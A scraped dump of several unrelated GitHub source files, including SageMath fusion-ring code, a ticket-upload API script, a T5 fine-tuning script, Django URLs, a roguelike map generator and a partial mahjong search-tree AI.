r\"\"\"\n Test whether all F-symbols are real.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False) # long time\n sage: f.fvars_are_real() # not tested (cypari issue in doctesting framework)\n True\n \"\"\"\n try:\n for k, v in self._fvars.items():\n AA(self._qqbar_embedding(v))\n except ValueError:\n print(\"the F-symbol {} (key {}) has a nonzero imaginary part\".format(v, k))\n return False\n return True\n\n def certify_pentagons(self, use_mp=True, verbose=False):\n r\"\"\"\n Obtain a certificate of satisfaction for the pentagon equations,\n up to floating-point error.\n\n This method converts the computed F-symbols (available through\n :meth:`get_fvars`) to native Python floats and then checks whether\n the pentagon equations are satisfied using floating point arithmetic.\n\n When ``self.FR().basis()`` has many elements, verifying satisfaction\n of the pentagon relations exactly using :meth:`get_defining_equations`\n with ``option=\"pentagons\"`` may take a long time. This method is\n faster, but it cannot provide mathematical guarantees.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"C3\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution() # long time\n Computing F-symbols for The Fusion Ring of Type C3 and level 1 with Integer Ring coefficients with 71 variables...\n Set up 134 hex and orthogonality constraints...\n Partitioned 134 equations into 17 components of size:\n [12, 12, 6, 6, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 1, 1, 1]\n Elimination epoch completed... 10 eqns remain in ideal basis\n Elimination epoch completed... 0 eqns remain in ideal basis\n Hex elim step solved for 51 / 71 variables\n Set up 121 reduced pentagons...\n Elimination epoch completed... 18 eqns remain in ideal basis\n Elimination epoch completed... 5 eqns remain in ideal basis\n Pent elim step solved for 64 / 71 variables\n Partitioned 5 equations into 1 components of size:\n [4]\n Elimination epoch completed... 0 eqns remain in ideal basis\n Partitioned 6 equations into 6 components of size:\n [1, 1, 1, 1, 1, 1]\n Computing appropriate NumberField...\n sage: f.certify_pentagons() is None # not tested (long time ~1.5s, cypari issue in doctesting framework)\n True\n \"\"\"\n fvars_copy = deepcopy(self._fvars)\n self._fvars = {sextuple: float(rhs) for sextuple, rhs in self.get_fvars_in_alg_field().items()}\n if use_mp:\n pool = Pool()\n else:\n pool = None\n n_proc = pool._processes if pool is not None else 1\n params = [(child_id, n_proc, verbose) for child_id in range(n_proc)]\n pe = self._map_triv_reduce('pent_verify', params, worker_pool=pool, chunksize=1, mp_thresh=0)\n if np.all(np.isclose(np.array(pe), 0, atol=1e-7)):\n if verbose:\n print(\"Found valid F-symbols for {}\".format(self._FR))\n pe = None\n else:\n if verbose:\n print(\"Something went wrong. Pentagons remain.\")\n self._fvars = fvars_copy\n return pe\n","repo_name":"sagemath/sage-archive-2023-02-01","sub_path":"src/sage/algebras/fusion_rings/f_matrix.py","file_name":"f_matrix.py","file_ext":"py","file_size_in_byte":100973,"program_lang":"python","lang":"en","doc_type":"code","stars":2037,"dataset":"github-code","pt":"40"} +{"seq_id":"25931950620","text":"#!/usr/local/bin/python3\n\n'''usage: load_tickets_api.py [-h] --file-path FILE_PATH --api-url API_URL --access-token ACCESS_TOKEN\n\nLoad a JSON export of Tickets into TIckets table via the tickets API. The tickets will be stored as the cognito user (token) whose runs this.\n\noptional arguments:\n -h, --help show this help message and exit\n --file-path FILE_PATH\n File path to json export of Ticket items.\n --api-url API_URL\n --access-token ACCESS_TOKEN\n '''\n\nimport json\nfrom argparse import ArgumentParser\n\nimport requests\n\n\ndef main(file_path: str, api_url: str, access_token: str):\n api_url += '/tickets'\n tickets = json.load(open(file_path))\n for ticket in tickets:\n ticket['startDate'], ticket['endDate'] = ticket['DateRange'].split('#')[:2]\n ticket['picks'] = ticket['Picks']\n\n all_tickets = list_tickets(api_url, access_token)\n print(f'Total tickets in DB: {len(all_tickets)}')\n\n for ticket in tickets:\n resp = put_ticket(ticket, api_url, access_token)\n resp.raise_for_status()\n print(resp)\n\n all_tickets = list_tickets(api_url, access_token)\n print(f'Total tickets in DB: {len(all_tickets)}')\n\n\ndef put_ticket(ticket: dict, api_url, access_token) -> requests.Response:\n\n resp = requests.put(\n api_url,\n headers={'Authorization': f'Bearer {access_token}'},\n json=ticket\n )\n return resp\n\n\ndef list_tickets(api_url, access_token):\n resp = requests.get(\n api_url,\n headers={'Authorization': f'Bearer {access_token}'})\n resp.raise_for_status()\n return resp.json()\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(\n description='Load a JSON export of Tickets into TIckets table via the tickets API. The tickets will be stored as the cognito user (token) whose runs this.')\n parser.add_argument('--file-path', required=True,\n help=\"File path to json export of Ticket items.\")\n parser.add_argument('--api-url', required=True)\n parser.add_argument('--access-token', required=True)\n args = parser.parse_args()\n main(args.file_path, args.api_url, args.access_token)\n","repo_name":"puremcc/lottochecker","sub_path":"backend/util/load_tickets_api.py","file_name":"load_tickets_api.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38160948795","text":"from ttt import *\n\nif __name__ == '__main__':\n args = get_args()\n ## uncomment if debugging\n # logger.info(f\"args: {json.dumps(args.__dict__, indent=2)}\")\n # ############### customize args\n # args.use_gpu = True\n # # args.use_tpu = True\n # # args.tpu_address = \"x.x.x.x\"\n # args.do_train = True\n # args.use_tb = True\n # # any one from MODELS_SUPPORT (check:ttt/args.py)\n # args.model_select = \"t5-base\"\n # # select a dataset. First check if it is from nlp, if yes load it here and save locally to the data_path\n # # or customize a data in the data_path (train.json, val.json, test.json) where examples are organised in jsonl format\n # # each line represents an example like this: {\"text\": \"...\", \"label\",\"...\"}\n # args.data_path = \"data/final\"\n # # any one from TASKS_SUPPORT (check:ttt/args.py)\n # args.task = \"t2t\"\n # args.log_steps = -1\n # # set do_eval = False if your data does not contain a validation set. In that case, patience, and early_stop will be invalid\n # args.do_eval = True\n # args.eval_batch_size=32\n # args.per_device_train_batch_size=8\n # args.num_epochs_train=12\n # args.source_field_name = \"source\"\n # args.target_field_name = \"target\"\n # args.max_src_length = 512\n # args.max_tgt_length = 512\n # args.task = \"translation\" # translation here generalizes to all source-target like tasks\n # args.lr=5e-5\n # # any one from LR_SCHEDULER_SUPPORT (check:ttt/args.py)\n # args.scheduler = \"warmuplinear\"\n ############### end customize args\n # to have a sanity check for the args\n sanity_check(args)\n # seed everything, make deterministic\n set_seed(args.seed)\n tokenizer = get_tokenizer(args)\n inputs = get_inputs(tokenizer, args)\n model, strategy = create_model(args, logger, get_model)\n # start training, here we customize T2TTrainer to get more control and flexibility\n trainer = T2TTrainer(args)\n trainer.train(model, strategy, tokenizer, inputs)\n","repo_name":"wangcongcong123/ttt","sub_path":"covid_event/finetune.py","file_name":"finetune.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"20162998078","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .import views \n\nurlpatterns = [\n path('', views.ApiOverView),\n path('task_list/', views.TaskList, name= 'task_list'),\n path('task_detial//', views.TaskDetialView, name='task_detial'),\n path('task_create/', views.TaskCreateView, name= 'task_create'),\n path('task_update//', views.TaskUpdateview, name='task_update'),\n path('task_delete//', views.TaskDelete, name='task_delete'),\n]\n","repo_name":"amanchaurasia512/ToDolist_DRF","sub_path":"ToDolistapps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11988451230","text":"import libtcodpy as libtcod\nimport math,random,copy\nfrom config import *\n\nfrom util import *\n\nclass OverworldTile:\n\n\tchar='.'\n\tx=0\n\ty=0\n\tblocked=False\n\t\n\tforeColor=None\n\tbackColor=None\n\t\n\tseen=False\n\t\n\tdef __init__(self,x,y):\n\t\tself.x=x\n\t\tself.y=y\n\t\t\n\tdef setChar(self,char): \n\t\tself.char=char\n\t\t\n\tdef setColors(self,fore,back):\n\t\tself.foreColor=fore\n\t\tself.backColor=back\n\t\t\n\tdef setBlocked(self,blocked): \n\t\tself.blocked=blocked\n\t\t\n\tdef isBlocked(self): return self.blocked\n\tdef isSeen(self): return self.seen\n\tdef gotSeen(self): self.seen=True\n\t\t\n\tdef draw(self,console,offset_x,offset_y):\n\t\tif not self.seen: return\n\t\tlibtcod.console_put_char_ex( console, self.x-offset_x, self.y-offset_y, self.char, self.foreColor, self.backColor)\n\t\t\n\t\t\nclass OverworldTileEntity:\n\n\tchar='#'\n\tx=0\n\ty=0\n\t\n\tforeColor=None\n\tbackColor=None\n\t\n\tdef __init__(self,x,y):\n\t\tself.x=x\n\t\tself.y=y\n\t\t\n\tdef setChar(self,char): \n\t\tself.char=char\n\t\t\n\tdef setColors(self,fore,back):\n\t\tself.foreColor=fore\n\t\tself.backColor=back\n\t\t\n\tdef position(self): return (self.x,self.y)\n\t\t\n\tdef draw(self,console,offset_x,offset_y):\n\t\t\n\t\tlibtcod.console_put_char_ex( console, self.x-offset_x, self.y-offset_y, self.char, self.foreColor, self.backColor)\n\nclass Overworld:\n\t\n\tlevel=None\n\tconsole=None\n\t\n\twidth=0\n\theight=0\n\t\n\tpathable=[]\n\tblockedMap=[]\n\t\n\tplayer=None\n\ttile_entity=[]\n\ttown=None\n\t\n\tdef render(self):\n\t\tc=self.console\n\t\tlibtcod.console_clear(c)\n\t\twx=cfg.SCREEN_WIDTH\n\t\twy=cfg.SCREEN_HEIGHT\n\t\t\n\t\tself.playerReveal()\n\t\toffset_x=self.player.x-cfg.WID2\n\t\tif offset_x+wx > self.width: offset_x=self.width-wx\n\t\tif offset_x<0: offset_x=0\n\t\t\n\t\toffset_y=self.player.y-cfg.HGT2\n\t\tif offset_y+wy > self.height: offset_y=self.height-wy\n\t\tif offset_y<0: offset_y=0\n\t\t\n\t\tfor x in xrange(wx):\n\t\t\tfor y in xrange(wy):\n\t\t\t\tself.level[offset_x+x][offset_y+y].draw(c,offset_x,offset_y)\n\t\t\t\t\n\t\tfor entity in self.tile_entity:\n\t\t\tpos=entity.position()\n\t\t\t#if self.level[pos[0]][pos[1]].seen: entity.draw(c,offset_x,offset_y)\n\t\t\tentity.draw(c,offset_x,offset_y)\n\t\t\t\t\n\t\tself.player.draw(c,offset_x,offset_y)\n\t\t\t\t\n\t\tlibtcod.console_blit(self.console,0,0,wx,wy,0,0,0)\n\t\t\n\tdef playerReveal(self):\n\t\tsight=15\n\t\tlibtcod.map_compute_fov(self.blockedMap,self.player.x,self.player.y,sight,True)\n\t\tself.level[self.player.x][self.player.y].gotSeen()\n\t\twx=cfg.WID2\n\t\twy=cfg.HGT2\n\t\tfor x in xrange(self.player.x-wx,self.player.x+wx):\n\t\t\tfor y in xrange(self.player.y-wy,self.player.y+wy):\n\t\t\t\tif libtcod.map_is_in_fov(self.blockedMap, x, y):\n\t\t\t\t\tself.level[x][y].gotSeen()\n\t\n\tdef playerStart(self,player):\n\t\tself.player=player\n\t\ttownPos=self.town.position()\n\t\tself.player.setPosition(townPos[0],townPos[1])\n\t\tself.player.newLevel(self)\n\t\t\n\tdef buildBlockedMap(self):\n\t\tbmap = libtcod.map_new(self.width,self.height)\n\t\t\n\t\tfor x in xrange(self.width):\n\t\t\tfor y in xrange(self.height):\n\t\t\t\tif self.level[x][y].blocked:\n\t\t\t\t\tlibtcod.map_set_properties(bmap,x,y,False,False)\n\t\t\t\telse:\n\t\t\t\t\tlibtcod.map_set_properties(bmap,x,y,True,True)\n\t\t\n\t\tself.blockedMap=bmap\n\t\t\n\tdef getWidth(self): return self.width\n\tdef getHeight(self): return self.height\n\t\n\tdef getBlockedMap(self): return self.blockedMap\n\tdef getPathable(self): return self.pathable\n\tdef isPathable(self,x,y): return (x,y) in self.pathable\n\tdef isSeen(self,x,y): return self.level[x][y].isSeen()\n\tdef isBlocked(self,x,y): return self.level[x][y].isBlocked()\n\t\n\tdef putThing(self,x,y,char=\"+\"): #debug\n\t\trlist=copy.copy(self.tile_entity)\n\t\tfor e in rlist:\n\t\t\tif e.position()==(x,y):\n\t\t\t\tself.tile_entity.remove(e)\n\t\t\t\t\n\t\tthing=OverworldTileEntity(x,y)\n\t\tthing.setChar(char)\n\t\tthing.setColors(libtcod.Color(random.randint(0,255), random.randint(0,255), random.randint(0,255)),libtcod.Color(0, 0, 0))\n\t\tself.tile_entity.append(thing)\n\t\t\n\tdef findPathable(self):\n\t\tself.pathable=[]\n\t\tw=self.width\n\t\th=self.height\n\t\tstart=(random.randint(1,w-1),random.randint(1,h-1))\n\t\twhile self.level[start[0]][start[1]].isBlocked(): start=(random.randint(1,w-1),random.randint(1,h-1))\n\t\t\n\t\topenlist=[]\n\t\topenlist.append(start)\n\t\tself.pathable.append(start)\n\t\t#rels=((1,1),(1,-1),(-1,1),(-1,-1))\n\t\trels=((0,1),(0,-1),(-1,0),(1,0))\n\t\t\n\t\twhile len(openlist):\n\t\t\tnewlist=copy.copy(openlist)\n\t\t\tfor coord in openlist:\n\t\t\t\tfor rel in rels:\n\t\t\t\t\tcrd=(coord[0]+rel[0],coord[1]+rel[1])\n\t\t\t\t\tif crd[0]<0 or crd[0]>=w or crd[1]<0 or crd[1]>=h: continue\n\t\t\t\t\tif self.level[crd[0]][crd[1]].isBlocked(): continue\n\t\t\t\t\t\n\t\t\t\t\tif crd not in self.pathable:\n\t\t\t\t\t\tnewlist.append(crd)\n\t\t\t\t\t\tself.pathable.append(crd)\n\t\t\t\tnewlist.remove(coord)\n\t\t\t\t\n\t\t\topenlist=copy.copy(newlist)\n\t\t\t\n\tdef clearUnpathableAreas(self):\n\t\tw=self.width\n\t\th=self.height\n\t\tfor x in xrange(w):\n\t\t\tfor y in xrange(h):\n\t\t\t\tif self.level[x][y].blocked: continue\n\t\t\t\tif not (x,y) in self.pathable:\n\t\t\t\t\tself.level[x][y].setBlocked(True)\n\t\t\n\tdef create(self):\n\t\tw=self.width=cfg.OW_WIDTH\n\t\th=self.height=cfg.OW_HEIGHT\n\t\tth=cfg.OW_TREE_THRES\n\t\t\n\t\tself.level=[[OverworldTile(j,i) for i in xrange(h)] for j in xrange(w)]\n\t\tself.console=libtcod.console_new(w,h)\n\n\t\tbackColor=libtcod.Color(0, 0, 0)\n\t\t\n\t\tnoise2d = libtcod.noise_new(2)\n\t\t\n\t\tfor x in xrange(w):\n\t\t\tfor y in xrange(h):\n\t\t\t\tzoom=0.09\n\t\t\t\tf = [zoom * x,zoom * y]\n\t\t\t\tval = libtcod.noise_get(noise2d,f)\n\t\t\t\tc1=int((((val*-1)+1)/2)*30)\n\t\t\t\tc2=10+int(((val+1)/2)*20)\n\t\t\t\t\n\t\t\t\tif val>th:\t\t\t\t\n\t\t\t\t\tself.level[x][y].setChar(23)\n\t\t\t\t\tself.level[x][y].setColors(libtcod.Color(0, 200, 0),libtcod.Color(0, 0, 0))\n\t\t\t\t\tself.level[x][y].setBlocked(True)\n\t\t\t\telse:\n\t\t\t\t\tself.level[x][y].setChar(176)\n\t\t\t\t\tself.level[x][y].setColors(libtcod.Color(0, c1, 0),libtcod.Color(0, c2, 0))\n\t\t\n\t\t\n\t\twhile len(self.pathable)<400: self.findPathable()\n\t\tself.clearUnpathableAreas()\n\t\t#self.findPathable() # Now a final scan for the full area\n\t\t\t\n\t\t# Place town\n\t\t\n\t\ttown_pos=random.choice(self.pathable)\n\t\ttown=OverworldTileEntity(town_pos[0],town_pos[1])\n\t\ttown.setColors(libtcod.Color(0, 100, 150),libtcod.Color(40, 40, 0))\n\t\tself.tile_entity.append(town)\n\t\tself.town=town\n\t\t\n\t\t# Place dungeons\n\t\t\n\t\tfor i in xrange(cfg.DUNGEONS):\n\t\t\n\t\t\tvalidLocation=False\n\t\t\tpos=None\n\t\t\twhile not validLocation:\n\t\t\t\tvalidLocation=True\n\t\t\t\tpos=random.choice(self.pathable)\n\t\t\t\tfor entity in self.tile_entity:\n\t\t\t\t\tif entity.position()==pos:\n\t\t\t\t\t\tvalidLocation=False\n\t\t\t\t\n\t\t\tdungeon=OverworldTileEntity(pos[0],pos[1])\n\t\t\tdungeon.setColors(libtcod.Color(200, 0, 0),libtcod.Color(40, 0, 0))\n\t\t\tself.tile_entity.append(dungeon)\n\t\t\t\n\t\tself.buildBlockedMap()","repo_name":"jdau/adungeon","sub_path":"overworld.py","file_name":"overworld.py","file_ext":"py","file_size_in_byte":6393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20362706366","text":"import setuptools\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"dopyapi\",\n version=\"0.0.1\",\n author=\"Mouhsen Ibrahim\",\n author_email=\"mouhsen.ibrahim@gmail.com\",\n description=\"Python Library to access Digital Ocean API\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/mohsenSy/dopyapi\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3.0\",\n \"Operating System :: OS Independent\",\n ],\n install_requires = [\n 'requests',\n 'requests-oauthlib'\n ],\n python_requires='>=3.6',\n)\n","repo_name":"mohsenSy/dopyapi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"11713396034","text":"class Solution:\n def gcdOfStrings(self, str1: str, str2: str) -> str:\n a = min(len(str1), len(str2))\n \n while a >= 1:\n if str1[:a] == str2[:a] and str1[:a] * (len(str1) // a) == str1 and str2[:a] * (len(str2) // a) == str2:\n return str1[:a]\n a -= 1\n \n return \"\"\n \n ","repo_name":"wongruiyang/leetcode-grind","sub_path":"1071-greatest-common-divisor-of-strings/1071-greatest-common-divisor-of-strings.py","file_name":"1071-greatest-common-divisor-of-strings.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38666617683","text":"# -*- coding:utf-8 -*-\n# cython: language_level=2\n# bug:递归迭代中有些情况没有返回值而无法返回\n# input 一种花色手牌,9^5种\n# python 2.0 两整数相处会自动取整,需要人为给被除数添加float型\n'''\n改进版本\n2020.0805\n金币场版本\ntodo 评估模块耗时问题\n\n拆搭子的情况在搭子的有效牌数量为0\n搭子的数量多于待需数量\n'''\n\nimport copy\nimport numpy as np\nimport time\n\n# import numpy as np\nimport math\nfrom mah_tool.so_lib import lib_MJ as MJ\nimport logging as logger\nfrom mah_tool.so_lib import opp_srmj as DFM\nimport datetime\nimport random\n# import thread\nimport os\n\n# logger = logging.getLogger(\"SRMJ_log\")\n# logger.setLevel(level=logging.DEBUG)\n# # log_path = \"/home/tonnn/recommondsrv_qipai/app/recommond/shangraoMJ/\"\n# # log_file = \"shangraoMJlog.txt\"\n# # if not os.path.isfile(log_path):\n# # os.mknod(log_path) #windows不存在node\n# # os.mkdir(log_path)\n# # with open(os.path.join(log_path,log_file),'a+') as fp:\n# #\n# # fp.close()\n#\n# # handler = logging.FileHandler(\"/home/tonnn/recommondsrv_qipai/app/recommond/shangraoMJ/shangraoMJlog.txt\")\n# time_now = datetime.datetime.now()\n# # log_path = \"./%i_log.txt\"%time_now.day\n# # print log_path\n# handler = logging.FileHandler(\"./%i%i%i_log.txt\" % (time_now.year, time_now.month, time_now.day))\n#\n# handler.setLevel(logging.INFO)\n#\n# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n# handler.setFormatter(formatter)\n#\n# logger.addHandler(handler)\n# logger.info(\"compile finished...\")\n\n# global variable\nTIME_START = time.time()\n\nw_ways = 1\nw_aa = (1 + 3 * w_ways + 4)\nw_ab = (1 + w_ways)\nw_type = 0\nROUND = 0\nt3Set = MJ.get_t3info()\nt2Set, t2Efc, efc_t2index = MJ.get_t2info()\n\nT_SELFMO = [0] * 34 # 自摸概率表,牌存在于牌墙中的概率表\nLEFT_NUM = [0] * 34 # 未出现的牌的数量表\nRT1 = [[0] * 34, [0] * 34] # 危险度表\nRT2 = [[0] * 34, [0] * 34]\nRT3 = [[0] * 34, [0] * 34]\n\nt1tot2_dict = {}\nt1tot3_dict = {}\nt2tot3_dict = {}\n\n'''\n抓牌结点类\n功能:保存抓牌结点的相关信息,包括抓牌,获取概率,本路径的所有抓过的牌,弃牌等,以及本路径现有的sz,kz,jiang \n'''\n\n\nclass CatchNode:\n def __init__(self, cards=[], catchCard=None, leftNum=[], remainNum=136, t2=[], level=0, kingCard=None, t2N=[],\n ocards=[], baoHuanYuan=0):\n \"\"\"\n 功能:类变量初始化\n :param cards: 手牌\n :param catchCard:抓牌\n :param leftNum: 剩余牌数量list\n :param remainNum: 剩余牌总数\n :param t2: 抓牌搭子\n :param level: 所处搜索树层数\n :param ocards: 出牌结点策略集合\n :param t2N: 抓牌结点扩炸集合\n :param kingCard: 宝牌\n \"\"\"\n self.type = 2\n self.cards = cards\n self.leftNum = leftNum\n self.catchCard = catchCard\n self.rate = 1\n if catchCard != None: # 获取概率\n if len(t2) == 1: # 单张牌,凑将\n if t2[0] == kingCard: # 宝吊处理\n self.rate = 1\n else: # 无宝摸将\n self.rate = float(\n leftNum[convert_hex2index(catchCard)]) / remainNum * 1\n elif len(t2) == 2:\n if t2[0] == t2[1]:\n self.rate = float(leftNum[convert_hex2index(catchCard)]) / remainNum * 8\n else:\n self.rate = float(leftNum[convert_hex2index(catchCard)]) / remainNum * 2\n else:\n pass\n # print('CatchNode Error 2!', catchCard, t2)\n # print catchCard ,t2, self.rate\n # if self.rate==0:\n # print ('rate=0,catchCard',catchCard)\n self.t2 = t2\n self.level = level # 在树中的层数\n\n self.kz = []\n self.sz = []\n self.jiang = 0x00\n self.parent = None # todo 可以使用hash表来存,可能会快一点\n self.children = []\n self.formerCatchCards = []\n self.formerOutCards = []\n # 增加宝牌的处理\n self.kingCard = kingCard\n self.feiKingNum = 0 # 飞宝数\n # self.noUseKingNum=0#待用宝牌数\n # self.usingKing=0 #\n self.baoHuanYuan = baoHuanYuan\n self.addKing = False\n self.t2N = t2N\n self.ocards = ocards\n self.firstOutCard = 0x00\n\n # def ac(self,t2):\n # if t2[0]+2==t2[1]:\n # return True\n # elif\n\n def setParent(self, parent):\n \"\"\"\n 设置父结点\n :param parent:父结点\n \"\"\"\n self.parent = parent\n\n def addChild(self, child):\n \"\"\"\n 增加子结点\n :param child:子结点\n \"\"\"\n self.children.append(child)\n\n def equal(self, newNode):\n \"\"\"\n 判断结点与本结点是否是同一结点\n :param newNode: 待比较的结点\n :return: bool 是否相同\n \"\"\"\n if newNode.catchCard == self.catchCard and newNode.kz == self.kz and newNode.sz == self.sz and newNode.jiang == self.jiang:\n return True\n\n return False\n\n def __repr__(self):\n # return \"{%d,%s,%s}\".format(self.type,self.cards,self.catchCard)\n return self.type, self.cards, self.catchCard, self.level\n\n def nodeInfo(self):\n print('type', self.type, 'cards', self.cards, 'catchCard', self.catchCard, 'rate', self.rate, 't2', self.t2,\n 'level', self.level, 'ocards', self.ocards, 't2N', self.t2N, 'kz', self.kz, 'sz', self.sz, 'jiang',\n self.jiang, 'formerCatchCards', self.formerCatchCards, 'formerOutCards', self.formerOutCards, 'kingCard',\n self.kingCard, 'baoHuanYuan', self.baoHuanYuan)\n\n\n'''\n出牌结点类\n功能:保存出牌结点相关信息,包括出牌,出牌危险度,本路径所有出的牌,抓的牌,以及本路径现有的sz,kz,jiang \n'''\n\n\nclass OutNode:\n def __init__(self, cards=[], outCard=[], level=0, dgRate=[], kingCard=None, t2N=[], ocards=[], baoHuanYuan=0):\n \"\"\"\n 初始化出牌结点类变量\n :param cards: 手牌\n :param outCard: 出牌\n :param level: 所处的搜索树层数\n :param ocards: 本路径的出牌策略结合\n :param t2N: 本路径的抓牌策略集合\n :param dgRate: 危险概率表\n :param kingCard: 宝牌\n \"\"\"\n self.type = 1\n self.cards = cards\n self.outCard = outCard\n self.level = level # 在树中的层数\n self.parent = None\n self.children = []\n self.kz = []\n self.sz = []\n self.jiang = 0x00\n\n self.formerCatchCards = []\n self.formerOutCards = []\n self.rate = dgRate[convert_hex2index(outCard)] # 危险概率\n # 增加宝牌的处理信息\n self.kingCard = kingCard\n self.feiKingNum = 0\n self.addKing = False\n self.t2N = t2N\n self.ocards = ocards\n self.baoHuanYuan = baoHuanYuan\n self.firstOutCard = 0x00\n\n def setParent(self, parent):\n \"\"\"\n 设置父结点\n :param parent:父结点\n \"\"\"\n self.parent = parent\n\n def addChild(self, child):\n \"\"\"\n 设置子结点\n :param child:子结点\n \"\"\"\n self.children.append(child)\n\n def equal(self, newNode):\n \"\"\"\n 判断结点是否相同\n :param newNode:待比较的结点\n :return: bool 是否相同\n \"\"\"\n if newNode.outCard == self.outCard and newNode.kz == self.kz and newNode.sz == self.sz and newNode.jiang == self.jiang:\n return True\n\n return False\n\n def nodeInfo(self):\n \"\"\"\n 打印结点信息\n \"\"\"\n print('type', self.type, 'cards', self.cards, 'outCard', self.outCard, 'rate', self.rate, 'level', self.level,\n 'ocards', self.ocards, 't2N', self.t2N, 'kz', self.kz, 'sz', self.sz, 'jiang', self.jiang,\n 'formerCatchCards', self.formerCatchCards, 'formerOutCards', self.formerOutCards, 'kingCard',\n self.kingCard, 'baoHuanYuan', self.baoHuanYuan)\n\n\n'''\n搜索树类,用于搜索最佳出牌\n'''\n\n\nclass SearchTree:\n def __init__(self, cards, suits, leftNum, all, remainNum, dgtable, kingCard, feiKingNum=0):\n \"\"\"\n 初始化类变量,以及搜索树的根结点\n :param cards: 手牌\n :param suits: 副露\n :param leftNum: 剩余牌\n :param all: 组合信息\n :param remainNum: 剩余牌\n :param dgtable: 危险度\n :param kingCard: 宝牌\n :param feiKingNum: feiKingNum飞宝数\n \"\"\"\n print('leftNum', leftNum)\n print('xts', all[0][4])\n # print('search tree : all',all)\n self.root = CatchNode(cards=cards, catchCard=None, leftNum=leftNum, remainNum=remainNum, t2=[], level=0,\n kingCard=kingCard)\n self.kingNum = cards.count(kingCard)\n self.root.feiKingNum = feiKingNum\n self.kingCard = kingCard\n self.cards = cards\n self.suits = suits\n self.leftNum = leftNum\n self.all = all\n self.xts = all[0][4]\n self.xts_min = all[0][4]\n self.remainNum = remainNum\n self.dgtable = dgtable\n self.stateSet = {}\n self.fei_king = feiKingNum\n # self.op_card=op_card\n # self.type=type\n self.scoreDict = {}\n self.t2Nw_Set = {}\n for suit in suits:\n if suit[0] != suit[1]:\n self.root.sz.append(suit[0])\n else:\n self.root.kz.append(suit[0])\n self.maxScore = [0, 0]\n # CI修正,当t2N溢出时,将概率最低的2N加入废牌区\n # CI = copy.deepcopy(all)\n # bl = 4 - len(suits)\n # for a in all:\n # ab = copy.deepcopy(a[3])\n # if a[2]!=[] and self.kingNum==0:\n # lenofT2Set=len(a[2])+len(a[3])-1\n # else:\n # lenofT2Set=len(a[2])+len(a[3])\n # if lenofT2Set>bl-len(a[0])-len(a[1]):\n # CI.remove(a)\n # ab_efc,w=self.get_effective_cards_w(a[3])\n #\n # for i in range(len(w)):\n # ab[i].append(w[i])\n #\n # ab.sort(key=lambda k: k[2], reverse=True)\n # min_ab=[]\n # for ab_ in ab:\n # if ab_[2]==ab[0][2]:\n # min_ab.append([ab_[0],ab_[1]])\n # for m_ab in min_ab:\n # C = copy.deepcopy(a)\n # # print (T2Set[-1])\n # # if ab[-1][0]==ab[-1][1]:\n # # C[2].remove([ab[-1][0],ab[-1][1]])\n # # else:\n # C[3].remove([m_ab[0], m_ab[1]])\n # C[-1].append(m_ab[0])\n # C[-1].append(m_ab[1])\n # CI.append(C)\n #\n # self.all=CI\n # print ('CI',CI)\n self.minList = self.minOut()\n # print (self.all)\n\n def minOut(self):\n minList = [0] * 34\n for i in range(34):\n if i in [0, 9, 18]:\n minList[i] = self.leftNum[i] * 2 + self.leftNum[i + 1] + self.leftNum[i + 2]\n elif i in [8, 17, 26]:\n minList[i] = self.leftNum[i] * 2 + self.leftNum[i - 1] + self.leftNum[i - 2]\n elif i in [1, 10, 19]:\n minList[i] = self.leftNum[i - 1] + self.leftNum[i] * 2 + self.leftNum[i + 1] + self.leftNum[i + 2]\n elif i in [7, 16, 25]:\n minList[i] = self.leftNum[i - 2] + self.leftNum[i - 1] + self.leftNum[i] * 2 + self.leftNum[i + 1]\n elif i >= 27:\n minList[i] = self.leftNum[i]\n else:\n minList[i] = self.leftNum[i - 2] + self.leftNum[i - 1] + self.leftNum[i] * 2 + self.leftNum[i + 1] + \\\n self.leftNum[i + 2]\n return minList\n\n def inChild(self, node, newNode):\n \"\"\"\n 判断搜索树结点是否已经创建,用于重复结点的判断\n :param node: 父结点\n :param newNode: 新创建的结点\n :return: 是否已经创建\n \"\"\"\n # flag=False\n # node的类型是出牌结点,子结点为抓牌结点,抓牌为t2\n if node.type == 1:\n for c in node.children:\n if c.equal(newNode):\n return c\n # node的类型时抓牌结点,子结点为出牌结点,即出的牌在子节点中\n if node.type == 2:\n for c in node.children:\n if c.equal(newNode):\n return c\n return None\n\n def get_effective_cards_w(self, dz_set=[]):\n \"\"\"\n 有效牌及其概率获取\n :param dz_set: 搭子集合 list[[]],剩余牌 []\n :param left_num: 有效牌集合[], 有效牌概率 []\n :return:\n \"\"\"\n left_num = self.leftNum\n cards_num = self.remainNum\n effective_cards = []\n w = []\n for dz in dz_set:\n if len(dz) == 1:\n effective_cards.append(dz[0])\n w.append(float(left_num[translate16_33(dz[0])]) / cards_num)\n elif dz[1] == dz[0]:\n effective_cards.append(dz[0])\n w.append(float(\n left_num[translate16_33(dz[0])]) / cards_num * 8.1) # 修改缩进,发现致命错误panic 忘了写float,这里写6是因为评估函数计算的缺陷\n\n elif dz[1] == dz[0] + 1:\n if 